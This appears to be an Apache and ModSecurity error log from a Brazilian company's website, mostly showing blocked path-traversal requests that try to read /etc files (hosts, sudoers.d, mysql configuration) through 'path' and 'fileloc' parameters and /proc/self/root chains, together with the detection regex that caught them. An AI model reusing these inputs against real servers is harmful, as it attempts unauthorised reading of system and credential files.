[Fri Mar 20 10:17:29.095281 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.3:60874] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1I6bninkcc-iUj5Ap53QAAA4s"]
[Fri Mar 20 10:17:29.235195 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.88:60884] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1I6bninkcc-iUj5Ap53gAAA5c"]
[Fri Mar 20 10:17:31.223013 2026] [:error] [pid 11167:tid 140411716749056] [client 57.141.18.15:60848] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1I6_HIg5MgXLBnicMSfQAAAcM"]
[Fri Mar 20 10:17:33.572625 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.52:32860] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1I7eoXxyEfFpUF8f-c5QAAAUI"]
[Fri Mar 20 10:17:51.035348 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.112:33916] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1I_zJ3M9BSuKP7CAY-hwAAAIQ"]
[Fri Mar 20 10:17:57.883754 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.37:34108] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1JBV1pVZ5mVmJwsFNMWwAAAFM"]
[Fri Mar 20 10:17:59.721495 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:43584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JB9a6ubjKNq_cu4b2BgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:18:01.519640 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.0:34576] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JCeoXxyEfFpUF8f-c_AAAAVI"]
[Fri Mar 20 10:18:12.122207 2026] [mime_magic:error] [pid 11642:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:35110] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:18:16.299821 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.54:35058] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JGPHIg5MgXLBnicMSqAAAAdM"]
[Fri Mar 20 10:18:20.730593 2026] [mime_magic:error] [pid 10189:tid 140411632822016] (70014)End of file found: [client 74.7.241.31:45620] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/bin
[Fri Mar 20 10:18:36.846047 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.123:36050] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JLF1pVZ5mVmJwsFNMfwAAAEY"]
[Fri Mar 20 10:18:44.871558 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.243.128:41758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JNLninkcc-iUj5Ap6KAAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:18:44.909416 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.124:36338] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JNPXLqtnMIWvjpaK3EQAAAog"]
[Fri Mar 20 10:19:07.050028 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 57.141.18.36:37580] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:19:08.474677 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.228.61:47216] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1JTDJ3M9BSuKP7CAY-8QAAAIE"]
[Fri Mar 20 10:19:17.422780 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.243.128:54614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JVPqxLDW4GITHUkQGewAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:19:19.215936 2026] [:error] [pid 9818:tid 140411540502272] [client 57.141.18.59:38024] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1JV11pVZ5mVmJwsFNMqQAAAFg"]
[Fri Mar 20 10:19:29.555089 2026] [:error] [pid 11642:tid 140411708356352] [client 57.141.18.80:38788] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JYLninkcc-iUj5Ap6YAAAA4Q"]
[Fri Mar 20 10:19:29.570904 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.109:38794] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JYTJ3M9BSuKP7CAY_DAAAAI4"]
[Fri Mar 20 10:19:33.055047 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.120:38952] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1JZda6ubjKNq_cu4b2cwAAA1Y"]
[Fri Mar 20 10:19:40.176467 2026] [mime_magic:error] [pid 10189:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:39300] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:19:43.414449 2026] [mime_magic:error] [pid 7893:tid 140411641214720] (70014)End of file found: [client 57.141.18.74:39596] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:20:02.293768 2026] [mime_magic:error] [pid 21219:tid 140411741927168] (70014)End of file found: [client 57.141.18.83:40790] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:20:02.296612 2026] [mime_magic:error] [pid 11167:tid 140411574073088] (70014)End of file found: [client 57.141.18.93:40788] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:20:04.614017 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:35042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1JhAF0L0L-SsrnPo6GAgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:20:05.363490 2026] [:error] [pid 10189:tid 140411616036608] [client 57.141.18.45:40820] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JhTJ3M9BSuKP7CAY_MwAAAI8"]
[Fri Mar 20 10:20:13.279025 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.123:41266] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Jjda6ubjKNq_cu4b2oAAAA0M"]
[Fri Mar 20 10:20:13.295107 2026] [access_compat:error] [pid 7235:tid 140411557287680] [client 195.123.216.134:50150] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:20:16.115454 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.114:41398] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Jj9a6ubjKNq_cu4b2qQAAA0Y"]
[Fri Mar 20 10:20:16.136650 2026] [access_compat:error] [pid 21219:tid 140411649607424] [client 171.25.193.35:43984] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:20:16.206069 2026] [:error] [pid 31215:tid 140411699963648] [client 57.141.18.38:41434] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JkAF0L0L-SsrnPo6GEwAAAsU"]
[Fri Mar 20 10:20:17.347445 2026] [:error] [pid 10189:tid 140411616036608] [client 57.141.18.31:41494] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JkTJ3M9BSuKP7CAY_QgAAAI8"]
[Fri Mar 20 10:20:17.733606 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.56:41514] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1JkRCii7xarUs8iHaGSwAAAhg"]
[Fri Mar 20 10:20:21.431989 2026] [access_compat:error] [pid 7235:tid 140411699963648] [client 38.246.34.123:38068] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
